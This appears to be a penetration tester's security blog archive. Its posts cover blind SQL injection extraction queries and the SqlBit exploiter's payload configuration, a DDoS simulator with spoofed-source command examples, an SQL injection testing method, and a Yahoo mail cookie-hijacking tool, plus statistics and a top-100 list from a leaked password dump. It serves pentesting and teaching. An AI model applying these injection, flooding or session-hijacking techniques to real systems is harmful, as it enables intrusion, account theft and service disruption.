Guide For Designing Cyber Security Exercises

Posted in Cyber Defense with tags , , , , on January 26, 2010 by stormsecurity

Here is an article that I’ve recently published at the Information Security and Privacy WSEAS International Conference – December 2009.

 Abstract: – Cyber security exercises are a very effective way of learning the practical aspects of information security. But designing such exercises is not an easy task and requires the work of several people. This paper presents a number of steps and guidelines that should be followed when designing a new cyber security exercise. The steps include: defining the objectives, choosing an approach, designing network topology, creating a scenario, establishing a set of rules, choosing appropriate metrics and learning lessons. The intended audience of this paper is persons who are in charge with design and organization of a new cyber security exercise and do not have the experience of previous exercises.

Key-Words: – cyber security exercise, cyber defense exercise, security education, design guide

If any questions, feel free to contact me.

Advertisements

GROUP_CONCAT() for Oracle blind SQL injection

Posted in How To on January 13, 2010 by stormsecurity

GROUP_CONCAT() is a MySQL function that returns a string formed by concatenating multiple rows of a table.

This function is very useful in blind SQL injection attacks where you often need to extract multiple rows from a table in a single query. Then you will probably obtain this data through an out-of-band channel.

Unfortunately, Oracle does not have such a function. So what do you do if you need to extract multiple rows in a single query?

After a few hours of searching I have found a solution that works:

Assuming you have a table called mytable which has a column called mycolumn, you can obtain a concatenation of all the values from mycolumn by using this query:

SELECT LTRIM(MAX(SYS_CONNECT_BY_PATH(mycolumn,',')) KEEP (DENSE_RANK LAST ORDER BY curr),',') AS xyz FROM (SELECT mycolumn, rownum AS curr, rownum -1 AS prev FROM mytable WHERE mycolumn <= 'C02BC00555') CONNECT BY prev = PRIOR curr START WITH curr = 1

This worked for me in Oracle 10g but I'm pretty sure it works for other versions too.

Cheers,

Check if your email account has been exposed!

Posted in News analysis with tags , , , , on October 12, 2009 by stormsecurity

This post is about the 24,000 email accounts that were recently made public (along with their passwords) on pastebin.com website, a few days ago. From the depths of the Internet (some Google cache) I have managed to get a copy of that list. I have split that list in two and HERE is the username list and HERE is the (shuffled!) password list.

Anyone interested can search himself in the username list to see if his account has been exposed. The passwords do not match because I have intentionally shuffled them. My purpose was not to expose peoples passwords but to make a statistic analisys on the 24k list, similar to this analysis made on the first 10k list of accounts posted on pastebin.com.

So, the list that I found had initially 24,546 entries. Not all of them were in the username@domain/password format so, after a bit of cleaning, I got a 23,573 list of useful accounts. Then I removed the duplicates and I got the final list of 21686 entries. On this list I have made my analysis.

I should mention that there are not only Hotmail accounts in the list but also Yahoo, Gmail, AoL and other accounts. Here is the top 20 domains and the number of accounts for each of them:

1. hotmail.com – 12478
2. yahoo.com – 3012
3. aol.com – 827
4. gmail.com – 512
5. msn.com – 443
6. hotmail.fr – 346
7. comcast.net – 321
8. aim.com – 287
9. sbcglobal.net – 275
10. hotmail.co.uk – 206
11. neomail.com – 153
12. hotmail.es – 117
13. cox.net – 116
14. verizon.net – 96
15. bellsouth.net – 95
16. live.com.mx – 71
17. yahoo.ca – 63
18. yahoo.co.uk – 63
19. charter.net – 47
20. earthlink.net – 46

And the pie version if you like:

Domain distribution

If we look at the usernames, we can see that the first 9,586 of them are alphabetically ordered and they are the ones from the first list posted on pastebin.com. They begin with letters ‘A’ and ‘B’. As Mr. Bogdan Calin said, based on their passwords, they seam to belong to the Latino community. But the rest of the accounts seam to be from worldwide.

The most used password is still 123456 . As you can see below, from the total of 21,686 passwords, 91 of them were 123456 . Here is the top 100 of the most commonly used passwords from the list:

1. 123456 – 91
2. neopets – 39
3. monkey – 27
4. 123456789 – 26
5. 123321 – 24
6. password – 23
7. iloveyou – 17
8. princess – 16
9. horses – 16
10. tigger – 15
11. pokemon – 14
12. cheese – 14
13. 111111 – 13
14. kitty – 13
15. purple – 12
16. dragon – 12
17. nicole – 12
18. 1234567 – 11
19. alejandra – 11
20. daniel – 11
21. bubbles – 10
22. alejandro – 10
23. michelle – 10
24. 12345 – 10
25. hello – 10
26. cookie – 10
27. chocolate – 9
28. hottie – 9
29. alberto – 9
30. 12345678 – 9
31. fluffy – 9
32. buddy – 9
33. 123123 – 9
34. cassie – 9
35. andrea – 9
36. secret – 9
37. shadow – 9
38. tequiero – 9
39. metallica – 9
40. poop – 8
41. hi – 8
42. sebastian – 8
43. jessica – 8
44. adopt – 8
45. 654321 – 8
46. justin – 7
47. newpw123 – 7
48. scooter – 7
49. soccer – 7
50. holly – 7
51. hannah – 7
52. flower – 7
53. 1234 – 7
54. jessie – 7
55. ashley – 7
56. tiger – 7
57. lauren – 7
58. football – 7
59. elizabeth – 7
60. casper – 7
61. roberto – 7
62. 000000 – 7
63. legolas – 7
64. estrella – 7
65. 159753 – 7
66. anime – 7
67. sabrina – 6
68. moomoo – 6
69. angelica – 6
70. cat123 – 6
71. bonita – 6
72. buster – 6
73. kitten – 6
74. killer – 6
75. qwerty – 6
76. chelsea – 6
77. sasuke – 6
78. olivia – 6
79. theresa – 6
80. america – 6
81. beatriz – 6
82. mariposa – 6
83. oscar – 6
84. rainbow – 6
85. yellow – 6
86. cool – 6
87. ginger – 6
88. maggie – 6
89. friends – 6
90. asdfgh – 6
91. abc123 – 6
92. neopet – 6
93. dancer – 6
94. amanda – 6
95. avatar – 6
96. boogie – 6
97. greenday – 6
98. thumper – 6
99. 666666 – 6
100. bob – 6

About the passwords format, I could extract the following statistics:

  • 43.3%   alphanum, lower case. Example: monkey
  • 2.1%     alphanum, lower and upper. Example: Thomas
  • 15.8%   numeric only passwords. Example: 123456
  • 35.1%   alphanum and numbers. Example: j0s3ph
  • 3.6%     alphanum, numbers and special chars. Example: sandra19_1961
  • 30%      numeric ended passwords. Example: hello1

If we look at the password lengths in the following graph, we can see that most of them are 6 characters long:

Password length distribution

In conclusion, now it’s a good time to do  our regular password change routine. Choose a long and complex password and beware of phishing attempts!

Cheers,

SqlBit – a new blind SQL injection exploiter

Posted in Tools (StormSecurity) with tags , , on October 8, 2009 by stormsecurity

SqlBit is a tool that can be used to execute arbitrary queries on a MySQL database and view the results by exploiting a blind SQL injection vulnerability on the web application that uses that database. It extracts data bit by bit. SqlBit can be downloaded and used freely from here.

You can run SqlBit like this:

perl    sqlbit.pl    “arbitrary SQL query”

Example:

perl    sqlbit.pl    “SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ “

This application was written in Perl so it can run anywhere you have a Perl interpreter (Windows, Linux, etc). It is fully customizable by using a configuration file config.txt where you can set many parameters from the HTTP request. The configuration file looks like this:

HTTP_Method=POST
URL=http://www.vulnerabile-site.com/login.php
HTTP_VERSION=HTTP/1.1
Host=www.vulnerabile-site.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) Paros/3.2.13
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Proxy-Connection=keep-alive
Referer=http://www.vulnerabile-site.com/index.php
Cookie=PHPSESSID=776a2e7181af170e7d57f51773b9527b
Content-Type=application/x-www-form-urlencoded
Content-Length=21
param: user=j’ and ($SQL$) — ‘
param: password=xxx

You can see that SqlBit requires a place where it can put a valid SQL query. You should previously test that this query gets executed successfully. This place must be specified by the string $SQL$.

That’s all about the functionality of SqlBit. If you want to know more, here is some background information:

During some of my pentests I encountered blind SQL injection vulnerabilities. I tried to use a few tools that were supposed to exploit them but none of them reached my expectations. So I decided to write my own tool and here it is.

As you may already know, blind SQL injection is when you can’t see the result of a query but it gets executed successfully on the server side. For instace:

httx://www.vulnerable-site.com/view.jsp?page=13′ limit 0 union select 1,2,3 from dual where 1 — ‘

This can be specified in SqlBit configuration file as:

param: page=13′ limit 0 union select 1,2,3 from dual where $SQL$ — ‘

If the URL above produces the same output as the legitimate URL:

httx://www.vulnerable-site.com/view.jsp?page=13

it might be because the parameter page is not filtered correctly and we can inject SQL commands. But we cannot always see the output of our SQL commands because of the application internal logic or other reasons.

In this case we can use a timing attack that is based on this MySQL query:

SELECT IF (expresion, true, false)

where expression is a query that returns true or false. In the true case we can sleep (BENCHMARK) a certain amount of time while in the false case we return directly. This way we are able to know if a bit of data is 0 or 1.

By automating the requests, we can extract data from the database bit by bit.

Enjoy!

Application Layer DDoS Simulator

Posted in DDoS, Tools (StormSecurity) with tags , , , on March 3, 2009 by stormsecurity

Update(november 2010):  ddosim v0.2 has been released. You can find it at: https://sourceforge.net/projects/ddosim/.

ddosim is a tool that can be used in a laboratory environment to simulate a distributed denial of service (DDOS) attack against a target server. The test will show the capacity of the server to handle application specific DDOS attacks. ddosim simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, ddosim starts the conversation with the listening application (e.g. HTTP server).

ddosim is written in C++ and runs on Linux. Its current functionalities include:

  • HTTP DDoS with valid requests
  • HTTP DDoS with invalid requests (similar to a DC++ attack)
  • SMTP DDoS
  • TCP connection flood on random port

In order to simulate such an attack in a lab environment we need to setup a network like this:

Network configuration for DDOS simulation

Network configuration for DDOS simulation

On the victim machine ddosim creates full TCP connections – which are only simulated connections on the attacker side.

There are a lot of options that make the tool  quite flexible:

Usage: ./ddosim
-d IP                   Target IP address
-p PORT            Target port
[-k NET]             Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME]      Output interface name
[-c COUNT]       Number of connections to establish
[-w DELAY]       Delay (in milliseconds) between SYN packets
[-r TYPE]             Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS]   Number of threads to use when sending packets (default 1)
[-n]                       Do not spoof source address (use local address)
[-v]                       Verbose mode (slower)
[-h]                       Print this help message

Examples:

1. Establish 10 TCP connections from random IP addresses to www server and send invalid HTTP requests (similar to a DC++ based attack):

./ddosim   -d 192.168.1.2   -p 80   -c 10   -r HTTP_INVALID  -i eth0

2. Establish infinite connections from source network 10.4.4.0 to SMTP server and send EHLO requests:

./ddosim   -d 192.168.1.2   -p 25   -k 10.4.4.0   -c 0   -r SMTP_EHLO  -i eth0

3. Establish infinite connections at higher speed to www server and make HTTP valid requests:

./ddosim   -d 192.168.1.2   -p 80   -c 0   -w 0   -t 10   -r HTTP_VALID  -i eth0

4. Establish infinite TCP connections (without sending a Layer 7 request)  from local address to a POP3 server:

./ddosim   -d 192.168.1.2   -p 110   -c 0  -i eth0

 

More background info:

Some of the hardest to mitigate distributed denial of service attacks are the ones targeting the application layer (in TCP/IP stack). They are difficult to stop because they look legitimate to classic firewalls which let them pass freely (for an example look here). The only way to stop this kind of attacks is deep packet inspection (layer 7 inspection) which means a lot of money/resources.

In general, a DDoS attack is performed by an armie of bots (zombies) that simultaneously send attack packets to a victim server. If we talk about UDP packets (ex. targeting a DNS server), the attack is easier to implement because a zombie needs to send a single UDP packet (multiple times) to contribute to the attack. But in case of a TCP based attack, the zombie needs first to establish the full TCP 3-way handshake and then send the data packets (e.g. HTTP GET request). ddosim successfully simulates this attack scenario.

If you have any questions regarding ddosim, please let me know.

Procedural SQL injection

Posted in How To with tags , , , , on October 15, 2008 by stormsecurity

How do you perform a complete SQL injection test on a web site?

As a penetration tester, I often had to test the security of various sites. One of the problems I have seen during those tests was that the results given by me were not 100% complete. I succeeded in finding many SQL injection bugs but sometimes not all of them. So I have developed a methodology that can be used to do thorough SQL injection tests.

My opinion is that automatic tools cannot find all SQL injection bugs, but only the superficial ones. Their results must be completed by manual tests that exploit the logic of the application and the flow of data within the application.

During the tests I use Paros as the automatic helper tool. It is a very good local web proxy that has MITM, spider and scanner capabilities. The steps to do an SQL injection test are:

  1. Start Paros and configure your web browser to use it as a proxy (localhost:8080). From now on, every request made by your browser will pass through Paros and you will be able to see it, resend it or modify it (including the “hidden” requests).
  2. The testing architecture looks like this:
  3. Start browsing manually the targeted website
    • Find as many forms as you can and submit them with random data
    • You can use the Site Map (if it exists) to identify the interactive pages (ex. Search, Contact, Feedback, Ask a question) and submit data
    • All the requests that you do will be memorized by Paros
  4. Use the Spider utility from Paros to do an automatic crawling in order to find as many pages as it can from that web site
    • Step 2 is necessary because Paros does not always find all the site pages and because it uses the pages already discovered to crawl them too
  5. Do an SQL injection scan with Paros
    • Chance the Scan Policy to include only SQL injection and SQL injection fingerprinting
    • Start the Scan
    • Paros will try to call all the dynamic pages that it has already found with parameters according to the Scan Policy
  6. Now comes the part that requires true skills
    • Analyse the alerts found by Paros
    • See what are the pages and parameters that allow injection
    • Reproduce manually the injection
    • Try to exploit the bug and find real information from the backed database
    • Categorize the vulnerability based on its impact (what can you do with it)
      • HIGH – allows extraction of information from the database (in band or out of band)
      • MEDIUM – allows the attacker to see application error messages but it is not obvious how it can be used to extract information from the database
      • LOW – produces an application dis-functionality but it does not give any error messages nor can be used to extract information from the database
  7. In order to find other SQL injection bugs, you must understand the logic of the application and try to “reverse-engineer” it. Think about how the programmer wrote the application and identify the vulnerable points.
  8. Write a detailed report on the vulnerabilities found and the ways they can be exploited in order to affect the information from the database and the functionality of the website.

I also found very useful some SQL injection cheat sheets for different databases like this and this.

Clear text email unsecurity (+ PoC)

Posted in Tools (StormSecurity) with tags , , , , on September 5, 2008 by stormsecurity

There are many people who use public available email systems like Yahoo mail, Hotmail, Gmail (HTTP). In this post you will see how easy it is to gain access to someone’s email session by exploiting the clear-text HTTP protocol. You can also find a tool I wrote – YM_hijack – which is a proof of concept of the theory described.

A little bit of theory

Web servers can identify a client through a piece of data that it sends called cookie. After the client authenticates itself to the server (by username and password) , the server assignes unique cookies to that client. When the client makes a request to the server using those cookies, the server knows that he is who he pretends to be and allows him to access personal data.

Most web-based email systems use the mechanism described above and most of them do not encrypt their traffic. As you know, HTTP is a clear text protocol and  anything sent in the network using HTTP can be sniffed and interpreted.

So, in a LAN environment, by using a sniffer and a man-in-the-middle tool you can get the cookies used for session identification and use them in your own browser to impersonate the real cookie owner. I think the image below clarifies the scenario.

Proof of concept – the automatic way

YM_hijack is a tool that automates the process described in the picture above. It must be run on the “Man in the Middle” host (see the picture). It does not have any MITM (man in the middle) capabilities so, in order to do that, you must use another tool like Cain or Ettercap or arpspoof or macof.

Prerequisites (for YM_hijack.exe):  Windows XP, Mozilla Firefox (2 or above)

Prerequisites (for YM_hijack.py):  Windows XP, Mozilla Firefox (2 or above), Python, Pcapy, Impacket

How does it work?

  • Make yourself Man-in-the-middle
  • Start YM_hijack.exe (or the python version) which does the following:
    • Sniff packets from the network destined for tcp port 80
    • Extract HTTP payload and search for Yahoo mail specific cookies (Y, B, T)
    • Create a new Firefox profile named after the IP address of the originator
    • Create the cookies.txt file in the newly created profile’s folder
    • Start a new instance of Firefox with the new profile
    • Enter directly into the Yahoo mail session of the ‘poor guy’

You can find more details by studying the source code (for python speakers).

The solutions:

  • use HTTPS during the entire session (Gmail has an option to do that)
  • encrypt your email content using PGP or a similar tool

Conclusion:

Think twice before using/choosing the email, especially with confidential information!